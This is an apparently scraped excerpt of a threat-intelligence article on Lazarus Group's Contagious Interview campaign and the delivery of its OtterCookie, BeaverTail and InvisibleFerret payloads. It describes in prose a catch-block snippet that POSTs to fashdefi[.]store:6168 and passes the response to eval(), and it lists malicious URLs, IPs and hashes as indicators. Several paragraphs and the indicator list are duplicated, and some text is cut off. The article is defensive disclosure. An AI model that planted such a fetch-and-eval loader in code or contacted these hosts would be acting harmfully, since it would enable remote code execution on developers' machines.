Lazarus Group Enhances Malware with New OtterCookie Payload Delivery Technique
Contents
The Contagious Interview campaign conducted by the Lazarus Group continues to expand its capabilities. We have observed an exponential evolution in the delivery mechanisms for the campaign’s main payloads: BeaverTail, InvisibleFerret, and OtterCookie.
In this article, we will discuss the innovations related to the delivery techniques used by the group and demonstrate the preservation of the group’s modus operandi throughout their code’s evolution. To this end, we analyzed 3 distinct malicious projects that were highly active in campaigns.
Delivery Mechanism 1: Eval Function
In one of the projects, the group’s developers created and implemented a code snippet that performs a POST request to an external address named fashdefi[.]store using port 6168.
After the request, the flow code captures the request’s response, stores it in the token object, and executes the content using the eval() function.
In this way, the code snippet above located within the catch block prevents the main payload (in this case, ‘invisible …
In this article, we will discuss the innovations related to the delivery techniques used by the group and demonstrate the preservation of the group’s modus operandi throughout their code’s evolution. To this end, we analyzed 3 distinct malicious projects that were highly active in campaigns.
Delivery Mechanism 1: Eval Function
In one of the projects, the group’s developers created and implemented a code snippet that performs a POST request to an external address named fashdefi[.]store using port 6168.
After the request, the flow code captures the request’s response, stores it in the token object, and executes the content using the eval() function.
In this way, the code snippet above located within the catch block prevents the main payload (in this case, ‘invisible …
IoC
https://bitbucket.org/0xhpenvynb/mvp_gamba/src/master/
http://fashdefi.store
http://bujey.store:6168/defy/v7
http://fashdefi.store:6168/defy/v7
https://cdn-static-server.vercel.app/icons/212
http://144.172.96.35
http://135.181.123.177
http://107.189.24.80
http://chainlink-api-v3.cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e
135.181.123.177
144.172.96.35
107.189.24.80
41ee7ddb2be173686dc3a73a49b4e93bc883ef363acca770f7ede891451122ab
56e15ef3b5e5f169fc063f8d3e88288e
http://fashdefi.store
http://bujey.store:6168/defy/v7
http://fashdefi.store:6168/defy/v7
https://cdn-static-server.vercel.app/icons/212
http://144.172.96.35
http://135.181.123.177
http://107.189.24.80
http://chainlink-api-v3.cloud/api/service/token/56e15ef3b5e5f169fc063f8d3e88288e
135.181.123.177
144.172.96.35
107.189.24.80
41ee7ddb2be173686dc3a73a49b4e93bc883ef363acca770f7ede891451122ab
56e15ef3b5e5f169fc063f8d3e88288e